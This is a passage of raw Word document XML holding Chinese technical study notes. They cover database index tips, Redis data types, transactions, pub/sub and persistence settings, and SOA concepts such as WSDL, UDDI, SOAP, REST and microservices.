        <w:pStyle w:val="29"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Sort时最好Sort的键也在索引上</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="29"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>索引最好能存储在内存中</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="29"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>确保索引的高选择性（可用复合索引代替单键索引和复合索引）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="43"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Redis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Redis是一个开源的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>内存存储的数据结构数据库</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，它可以作为数据库，缓存，消息队列。支持多种数据格式。和mc相比具有数据持久化的能力。并能通过哨兵和集群提高可用性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>它具有以下数据类型：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="46"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符串类型</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在Redis里面采用的是SDS来封装char[]的，这个也是redis的最小存储单元。RedisObject是redis的基本数据类型，对照C#中的Object对象。而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>字符串类型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就是在RedisObject基础上封装的代码。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其中的incr,incrby命令可以实现原子自增，用它来</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>生成唯一订单号</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比较方便。因为如果在当前服务器生成一个订单号，如果面对高并发的情况有可能会产生两个相同的订单号。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不同类型均可调用的命令：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Exists key可以检测键是否存在</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Type key 可返回key对应值的存储类型</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Expires key seconds 可设置key的存在时间</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Persist key 可设置key为持久化</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TTL key 返回key剩余的存在时间</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="46"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>列表类型</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>List类型按照插入顺序排序，最常用作消息队列，常用的就四个方法LPOP,LPUSH,RPOP,RPUSH。我们可将能够异步处理的请求放到消息队列中去。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="46"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>哈希类型</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Redis中的哈希类型，可以用来存放对象了，类似与C#中的Dictionary以键值对的形式存放数据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="46"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>集合类型</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>集合类型是哈希类型的“简易版”，它比Dictionary节省很多内存消耗，类似C#的HashSet类型。底层数据结构和哈希类型类似，只是value为null，所以key不能重复，且无序。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="46"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有序集合类型</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有序集合和哈希类型的最大区别就是范围查找时它的时间复杂度为O(logN) + M，后者为O(N)。它的每一个字符串元素都会关联到score，里面的元素总是通过score进行排序。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="46"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>事务</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Multi，Exec，Discard，Watch是Redis的事务命令。事务一般分为3个步骤：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>生成事务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（Multi），</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>生成命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（各种Redis命令），</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>执行命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（Exec）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Redis中没有回滚的说法。因为Redis命令只有在因语法错误而失败，或是命令用在了错误类型的键上面。这也就是说是由于编程错误造成的。而且不支持回滚也可以让Redis保持快速且简单。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>假如在你执行命令的过程中，要修改的那些数据发生了改变，那我执行的命令有什么用呢？所以Watch命令就是为此而生的。Watch命令的作用就是假如在multi之后exec之前这段时间里key的值发生了修改，那么exec就会失败。你只需要在multi之前用watch去监视key就行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="46"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>订阅/发布</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>很多的消息队列都有这个功能，比较常见的场景是邮件订阅，比如你订阅了某个作者的博客，如果博主发了文章那么那些订阅了它的读者就能收到通知。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">常见的命令就两个：subscribe channel </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>订阅频道</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，publish channel message 给指定频道</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>发布消息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还有一个就是psubscribe pattern 订阅复合模式的频道。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="46"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>持久化</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>edis有两种持久化方式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>RDB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（也叫</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>快照</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>AOF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。快照指的是每隔一段时间就对你的数据进行一次存储。AOF则会记录每一次对服务器的写入操作，当服务器重启时会重新执行这些命令恢复原始数据，而且redis还会对aof文件进行重写防止过大。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>你可以同时开启两种持久化方式。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>快照的优点是可以最大化redis的性能，缺点是可能会丢失几秒钟甚至几分钟的数据。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AOF的优点是让redis更加耐久，默认是每秒保存一次数据，缺点是AOF的速度可能会比快照慢一些。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>快照的配置方法可为：在配置文件</w:t>
      </w:r>
      <w:r>
        <w:t>SNAPSHOTTING</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>节中，标记save seconds change，后面再设置以下存储的位置即可。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AOF的配置方法为：在配置文件的</w:t>
      </w:r>
      <w:r>
        <w:t>APPEND ONLY MODE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>节中，设置</w:t>
      </w:r>
      <w:r>
        <w:t>appendonly yes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（默认配置），再指定存储文件，保存频率，这里推荐采用默认配置</w:t>
      </w:r>
      <w:r>
        <w:t>appendfsync everysec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即可。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>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面向服务架构SOA</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>通过服务整合来解决系统集成的一种思想</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>WSDL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Web Services Description Language是一个用来描述Web服务和说明如何与Web服务通信的XML语言。为用户提供详细的接口说明书</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>UDDI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Universal Description，Discovery and Integration统一描述、发现和集成, 提供一种发布和查找服务描述的方法。UDDI 数据实体提供对定义业务和服务信息的支持。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SOAP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Simple Object AccessProtocol，简单对象访问协议，基于XML 和 HTTP 用于在应用程序之间进行通信的一种通信协议</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Web Services：基于SOAP协议，数据格式是XML</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Wcf/Wcf Rest：可以不依赖于IIS，基于SOAP，支持多种通信协议，但配置繁琐</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>测试工具：SoapUI...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>REST</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>REpresentational State Transfer ，表现层状态转移，是一种架构风格，提供了设计概念原则和约束。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>RESTful</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>满足这些原则和条件的就称RESTful架构</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Web API：RESTful的实现，一个用于构建HTTP服务的框架</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>测试工具：Fiddler、Postman、Jmeter...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>微服务</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是SOA的一种实现，更侧重于组件化和服务化</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
